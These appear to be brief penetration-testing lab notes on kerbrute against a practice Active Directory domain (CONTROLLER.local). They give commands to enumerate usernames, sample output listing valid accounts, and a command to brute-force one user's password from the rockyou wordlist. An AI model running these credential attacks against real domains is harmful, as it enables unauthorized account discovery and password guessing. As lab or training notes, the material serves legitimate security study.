kerbrute

Enumerate usernames

user.txt = /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
user.txt = wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/User.txt -O user.txt

/opt/windows/kerbrute userenum -d CONTROLLER.local --dc CONTROLLER.local user.txt
|->
2023/07/01 05:26:30 >  [+] VALID USERNAME:       administrator@CONTROLLER.local
2023/07/01 05:26:30 >  [+] VALID USERNAME:       admin1@CONTROLLER.local
2023/07/01 05:26:30 >  [+] VALID USERNAME:       admin2@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       machine2@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       httpservice@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       user3@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       user2@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       user1@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       machine1@CONTROLLER.local
2023/07/01 05:26:31 >  [+] VALID USERNAME:       sqlservice@CONTROLLER.local

Bruteforce a single user's password from a wordlist

/opt/windows/kerbrute bruteuser -v --dc CONTROLLER.local -d CONTROLLER.local /usr/share/wordlists/rockyou.txt admin1